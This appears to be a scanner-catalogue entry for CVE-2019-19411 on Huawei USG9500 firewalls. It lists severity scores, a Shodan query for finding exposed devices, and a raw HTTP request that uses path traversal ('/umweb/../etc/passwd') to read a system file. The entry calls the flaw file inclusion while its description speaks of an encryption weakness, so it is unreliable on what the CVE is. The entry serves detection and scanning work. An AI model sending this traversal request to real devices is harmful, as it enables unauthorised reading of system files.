| Title | Huawei Firewall - Local File Inclusion |
|---|---|
| Author | taielab |
| Severity | Low |
| Impact | Attackers with network access can exploit the weakened encryption to potentially recover confidential information that was meant to be protected by the encryption algorithm. |
| Remediation | Upgrade to a patched firmware version provided by Huawei or apply vendor-recommended mitigations. |
| CVSS Score | 3.7 |
| EPSS Score | 0.02952 |
| CVE ID | CVE-2019-19411 |
| CWE ID | CWE-665 |
| Shodan Query | title:"HUAWEI" |
| Tags | cve cve2019 huawei firewall lfi vuln |
USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.
GET /umweb/../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-19411.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-19411.pcap
N/AN/A